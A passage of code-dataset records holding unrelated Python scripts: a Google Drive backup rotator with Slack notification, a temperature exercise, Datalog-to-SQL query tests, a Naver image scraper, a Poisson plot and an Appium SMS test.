self.drive_service.files().list(q=\"'{0}' in parents and mimeType='application/vnd.google-apps.folder'\".format(self.main_folder_id),\n orderBy='createdTime asc',\n spaces='drive',\n pageSize=100,\n fields='nextPageToken, files(id, name)'\n ).execute()\n items = results.get('files', [])\n\n # Search folder for existing folder\n if items:\n for item in items:\n if item['name']==destination_folder_name:\n self.destination_folder_id = item['id']\n \n # Create eventually\n if self.destination_folder_id == 0:\n print('Create destination folder')\n file_metadata = {\n 'name': destination_folder_name,\n 'mimeType': 'application/vnd.google-apps.folder',\n 'parents': [self.main_folder_id]\n }\n\n destination_folder = self.drive_service.files().create(body=file_metadata,\n fields='id').execute()\n self.destination_folder_id = destination_folder.get('id')\n \n if self.destination_folder_id == 0:\n raise BaseException('No destination folder')\n else:\n print('Destination folder found (id:%s)' % self.destination_folder_id)\n return 1\n\n def get_backup_number(self):\n data = self.drive_service.files().get(fileId=self.destination_folder_id, fields=\"appProperties\").execute()\n print(data)\n if 'appProperties' in data and 'backup_number' in data['appProperties']:\n self.backup_number = int(data['appProperties']['backup_number']) + 1\n print('This is backup number %s' % self.backup_number)\n else:\n print('WARNING : No backup number found in folder metadata')\n\n def save_backup_number(self):\n properties= {\n 'appProperties': {\n 'backup_number': self.backup_number\n }\n }\n data = self.drive_service.files().update(body=properties, fileId=self.destination_folder_id, fields=\"id, appProperties\").execute()\n print('New backup number saved (%s)' % self.backup_number)\n \n def create_backup_folder(self,backup_number):\n backup_folder_name = '{0} - {1}'.format(self.backup_number, self.now.isoformat())\n print('Create backup folder')\n\n file_metadata = {\n 'name': backup_folder_name,\n 'mimeType': 'application/vnd.google-apps.folder',\n 'parents': [self.destination_folder_id],\n 'appProperties': {\n 'backup_number': self.backup_number\n }\n }\n\n backup_folder = self.drive_service.files().create(body=file_metadata,\n fields='id, appProperties').execute()\n self.backup_folder_id = backup_folder.get('id')\n \n if self.backup_folder_id == 0:\n raise BaseException('No backup folder')\n else:\n print('Backup folder found (id:%s)' % self.backup_folder_id)\n return 1\n\n def upload_file(self, file):\n print('Upload file : %s' % file)\n\n if not os.path.isfile(file):\n raise BaseException('Backup file not found')\n\n # Upload backup file\n file_metadata = {\n 'name': '{0}.{1}'.format(self.now.isoformat(),file),\n 'parents': [self.backup_folder_id]\n }\n media = MediaFileUpload(file)\n drive_file = self.drive_service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File saved (id:%s)' % drive_file.get('id'))\n\n def slack_notification(self, file):\n payload = \"{\\\"text\\\":\\\"Backup finished (%s)\\\"}\" % file\n (resp, content) = Http().request(self.config['slack_url'],\n \"POST\", body=payload,\n headers={'content-type':'application/json'})\n\n def clean(self):\n # Search sub folders\n results = self.drive_service.files().list(q=\"'{0}' in parents and mimeType='application/vnd.google-apps.folder'\".format(self.destination_folder_id),\n orderBy='createdTime asc',\n spaces='drive',\n pageSize=100,\n fields='nextPageToken, files(id, name, appProperties)'\n ).execute()\n items = results.get('files', [])\n\n # Search folder for existing folder\n keep = []\n oldest_number = self.backup_number - self.config['rotation']['last'] + 1\n if items:\n for item in items:\n # print(item['name'])\n if 'appProperties' in item and 'backup_number' in item['appProperties']:\n old_backup_number = int(item['appProperties']['backup_number'])\n if old_backup_number >= oldest_number:\n print('Keep %s' % item['name'])\n keep.append(item['id'])\n for modulo in self.config['rotation']['modulo']:\n if old_backup_number%modulo == 0 and (old_backup_number//modulo >= ((self.backup_number//modulo)-1)):\n print('Keep %s' % item['name'])\n keep.append(item['id'])\n for item in items:\n if 'appProperties' in item and 'backup_number' in item['appProperties']:\n delete=True\n for k in keep:\n if item['id'] == k:\n delete = False\n break\n if delete:\n print('Delete %s' % item['name'])\n data = self.drive_service.files().delete(fileId=item['id'], fields=\"id\").execute()\n\n def backup(self, files_to_backup):\n print(self.config_path)\n print(self.credentials_path)\n self.check_main_folder()\n self.check_destination_folder()\n self.get_backup_number()\n self.create_backup_folder(self.backup_number)\n print('Start Backup')\n for file in files_to_backup:\n self.upload_file(file)\n self.slack_notification('{0} - {1}'.format(self.config['destination_folder_name'], self.backup_number))\n self.save_backup_number()\n self.clean()\n time.sleep(3)\n return 1\n\ndef main():\n script_path = os.path.realpath(sys.path[0])\n files_to_backup = []\n\n if len(sys.argv) == 1:\n raise BaseException('Missing Arguments')\n else:\n i=1\n while i < len(sys.argv):\n files_to_backup.append(sys.argv[i])\n i += 1\n\n backup_manager = BackupManager(script_path)\n backup_manager.read_config()\n backup_manager.connect_drive()\n backup_manager.check_main_folder()\n backup_manager.check_destination_folder()\n backup_manager.get_backup_number()\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/get_token.py","file_name":"get_token.py","file_ext":"py","file_size_in_byte":11036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"364432829","text":"\ndef cel_to_fah(deg_in_cel):\n deg_in_fah = deg_in_cel*9/5+32\n return deg_in_fah\n\ntemperatures=[10,-20,-289,100]\n\nfor deg in temperatures:\n if deg < -273.15:\n print(\"Temperature cannot be lower than -273.15\")\n else:\n print(cel_to_fah(deg))\n","sub_path":"scripts/Section5/exercise4.py","file_name":"exercise4.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"1043913","text":"\n#from evaluate_query import *\nfrom yadi.dataStructures.query import *\nfrom yadi.dataStructures.relation import *\nfrom yadi.dataStructures.element import *\nfrom yadi.dataStructures.constraint import *\nfrom yadi.queryExecutor.queryExecutor import *\nfrom yadi.queryExecutor.sqlFactory import *\n\n\ndef test(list_queries):\n gen = SQLGenerator()\n for i in range(0,len(list_queries)):\n print ('Test :'+ str(i))\n print ('Original:')\n print (str(list_queries[i]))\n print ('Result:')\n try:\n print (QueryExecutor().execute_query(list_queries[i]))\n except Exception as e:\n print(e)\n print ('---------------------------------------------------------')\n\n\n\nqueries = []\n\n#M(title) :- movie(title,length_min), length_mins>100.\nr = RelationInQuery('movie', [Variable('title'),Wildcard(),Variable('length_mins'), Wildcard()], False)\nq = ConjunctiveQuery([r], [Constraint(Variable('length_mins'), Constant('100'), '>=')], RelationInQuery('M', [Variable('title')]))\n\nqueries.append(q)\n# ------\n# Q(X):-!S(Y),X=Y,Y=2\nr = RelationInQuery('S', [Variable('Y')],True)\nq = ConjunctiveQuery([r],[Constraint(Variable('X'), Variable('Y'), '='),Constraint(Variable('Y'), Constant('2'), '=')],RelationInQuery('Q', [Variable('X')]))\n\nqueries.append(q)\n\n#------\n#Q(X):- S(X)\nr = RelationInQuery('S', [Variable('X')])\nq = ConjunctiveQuery([r],[],RelationInQuery('Q', [Variable('X')]))\nqueries.append(q)\n\n# ------\n# Q(X):- S(X), X = 2\nr = RelationInQuery('S', [Variable('X')])\nhead = RelationInQuery('Q', [Variable('X')])\nqueries.append(ConjunctiveQuery([r],[Constraint(Variable('X'),Constant('2'),'=')],head))\n\n# ------\n\ns = RelationInQuery('S', [Variable('X'),Variable('Y')])\nt = RelationInQuery('T', [Variable('X')], True)\nqueries.append(ConjunctiveQuery([s,t],[Constraint(Variable('Y'), Variable('Z'), '=')],RelationInQuery('Q',[Variable('X'),Variable('Z')])))\n\n\n# ------\n\n# R(X,Y),!S(Z), Y=Z\ns = RelationInQuery('R', [Variable('X'),Variable('Y')])\nt = RelationInQuery('S', [Variable('Z')], True)\n\nqueries.append(ConjunctiveQuery([s,t],[Constraint(Variable('Y'), Variable('Z'), '=')]))\n\n# R(X,Y),!S(Z)\n\ns = RelationInQuery('R', [Variable('X'),Variable('Y')])\nt = RelationInQuery('S', [Variable('Z')], True)\n\nqueries.append(ConjunctiveQuery([s,t],[]))\n\n\n# answer(X,Y) :- R(X,A), S(A,Y).\n\ns = RelationInQuery('R', [Variable('X'),Variable('A')])\nt = RelationInQuery('S', [Variable('A'),Variable('Y')])\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])\nqueries.append(ConjunctiveQuery([s,t],[],head))\n\n# answer(X,2) :- R(X,A), S(A,_).\n\ns = RelationInQuery('R', [Variable('X'),Variable('A')])\nt = RelationInQuery('S', [Variable('A'),Wildcard()])\nhead = RelationInQuery('answer',[Variable('X'),Constant('2')])\nqueries.append(ConjunctiveQuery([s,t],[],head))\n\n\n# r(_,2)\n\nr = RelationInQuery('answer',[Wildcard(),Constant('2')])\nqueries.append(ConjunctiveQuery([r],[]))\n\n# R(_,A), S(A,_). -> answer(A) :- R(_,A), S(A,_).\n\ns = RelationInQuery('R', [Wildcard(),Variable('A')])\nt = RelationInQuery('S', [Variable('A'),Wildcard()])\n\nqueries.append(ConjunctiveQuery([s,t],[]))\n\n# R(X,Y) :- S(X), S(Y), X>Y\n\ns = RelationInQuery('S', [Variable('X')])\nt = RelationInQuery('S', [Variable('Y')])\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])\nqueries.append(ConjunctiveQuery([s,t],[Constraint(Variable('X'),Variable('Y'),'>')],head))\n\n# R(X,Y) :- S(X), Y>2\n\ns = RelationInQuery('S', [Variable('X')])\n\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])\nqueries.append(ConjunctiveQuery([s],[Constraint(Variable('Y'),Constant('2'),'>')],head))\n\n# R(X) :- S(X), X<2\n\ns = RelationInQuery('S', [Variable('X')])\n\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])\nqueries.append(ConjunctiveQuery([s],[Constraint(Variable('X'),Constant('2'),'<')],head))\n\n# answer(X,Y):-S(X,Z),S(Y,Z),X>Y\n\ns = RelationInQuery('S', [Variable('X'),Variable('Z')])\nt = RelationInQuery('S', [Variable('Y'),Variable('Z')])\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])\n\nqueries.append(ConjunctiveQuery([s,t],[Constraint(Variable('X'),Variable('Y'),'>')],head))\n\n\n# R(X) :- X = 2, 3<X\n\nhead = RelationInQuery('R',[Variable('X')])\n\nqueries.append(ConjunctiveQuery([],[Constraint(Variable('X'),Constant('2'),'='),Constraint(Constant('3'),Variable('X'),'<')],head))\n\n# r(_,2), X = 2\n\nr = RelationInQuery('R',[Wildcard(),Constant('2')])\nqueries.append(ConjunctiveQuery([r],[Constraint(Variable('X'), Constant('2'), '=')]))\n\n# R(X,Y) :- S(X), S(Y,T), T(X), U(Y), X>Y\ns = RelationInQuery('S', [Variable('X')])\nt = RelationInQuery('S', [Variable('Y')])\nu = RelationInQuery('T', [Variable('X')])\nv = RelationInQuery('V', [Variable('Y')])\nhead = RelationInQuery('answer',[Variable('X'),Variable('Y')])\nqueries.append(ConjunctiveQuery([s,t,u,v],[Constraint(Variable('X'),Variable('Y'),'>')],head))\ntest(queries)\n\n\n","sub_path":"tests/sql_generator_tests.py","file_name":"sql_generator_tests.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"542546447","text":"from bs4 import BeautifulSoup\nimport urllib.request as req\nimport urllib.parse as rep\nimport os\nimport errno\n\n# 네이버에서 헤더 정보가 없는 크롤링 및 스크랩핑은 403 forbidden (접근 거부) 처리하고 있어서 밑에 헤더정보 추가\nopener = req.build_opener()\nopener.addheaders = [('User-agent', 'Mozilla/5.0')]\nreq.install_opener(opener)\n\nbase = \"https://search.naver.com/search.naver?where=image&sm=tab_jum&query=\"\nquote = rep.quote_plus(\"멍뭉이\")\nurl = base + quote\n\nres = req.urlopen(url)\nsavePath = \"C:/Users/PSW/Desktop/HOLO/WebCrawler/Beautifulsoup/imagedown\"\n\ntry:\n if not (os.path.isdir(savePath)): # 그러한 디렉토리가 있는지 확인\n os.makedirs(os.path.join(savePath)) # 없으면 디렉토리를 만들어낸다\nexcept OSError as e:\n if e.errno != errno.EEXIST:\n print(\"폴더 만들기 실패!\")\n raise\n\nsoup = BeautifulSoup(res, \"html.parser\")\n\nimg_list = soup.select(\"div.img_area > a.thumb._thumb > img\") # 크롬 개발자 도구의 Copy selector 를 이용하면 쉽게 보여줌\n\nfor i, img_list in enumerate(img_list, 1):\n #print(img_list['src']) base64 형식으로 변환된 소스... 이거로는 다운받을 수 없다.\n #print(img_list['data-source'])\n fullFileName = os.path.join(savePath, str(i) + \".jpg\")\n #print(fullFileName)\n req.urlretrieve(img_list['data-source'], fullFileName)\n\nprint(\"다운로드 완료\")\n","sub_path":"WebCrawler/Beautifulsoup/download2-8-1.py","file_name":"download2-8-1.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"288870989","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n#PROBLEM 3: Bernoulli Trials by Poisson distribution\n\ndef problem3():\n n = 1000\n p = 0.001\n x = np.zeros((19, 1))\n y = np.zeros((19, 1))\n\n #Performing calculations using Poisson formula\n for k in range(19):\n lambdaVal=n*p\n f = (lambdaVal**k / math.factorial(k)) * math.exp(-lambdaVal)\n x[k] = k\n y[k] = f\n\n plotting(x, y)\n\ndef plotting(x,y):\n # Setting the x values\n xRange = range(0,19)\n xSize = np.size(xRange) # number of x values\n\n # Plotting stem plot for PMF\n plt.stem(x,y, use_line_collection=True) # stem plot (x,y,...)\n\n # Labels for the plot\n plt.title('Bernoulli Trials: PMF - Poisson Approximation', fontsize=14, #CHANGE THE TITLES FOR EACH PLOT AND FOR EACH CODE YOU PUT IN REPORT\n fontweight='bold')\n plt.xlabel('Number of successes in n=1000 trials', fontsize=14)\n plt.ylabel('Probability', fontsize=14, )\n plt.xticks(xRange)\n filename=input(\"Enter a name and extension (.pdf) to save the file as :\")\n plt.savefig(filename)\n\nproblem3()","sub_path":"Probaility and Statistics/EE381_project3/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"124517522","text":"import pytest\n\nfrom base.base_driver import baseDriver\nfrom page.page_edit_mms import EditMms\nfrom page.page_new_mms import NewMmS\n\n\nclass TestMms():\n\n def setup(self):\n self.driver = baseDriver(appPackage=\"com.android.mms\", appActivity=\"com.android.mms.ui.ConversationList\")\n self.newMms = NewMmS(self.driver)\n self.editMms = EditMms(self.driver)\n\n def teardown(self):\n self.driver.quit()\n\n @pytest.mark.parametrize((\"recipienter\", \"text\"),[(18871102549, \"hello01\"), (13545687895, \"这是中国哈哈哈哈\")])\n def test_sendMms(self, recipienter, text):\n self.newMms.click_new_mms()\n self.editMms.input_recipienter(recipienter)\n self.editMms.input_mms_text(text)\n self.editMms.click_send()","sub_path":"PO案例_案例/scripts/test_mms.py","file_name":"test_mms.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}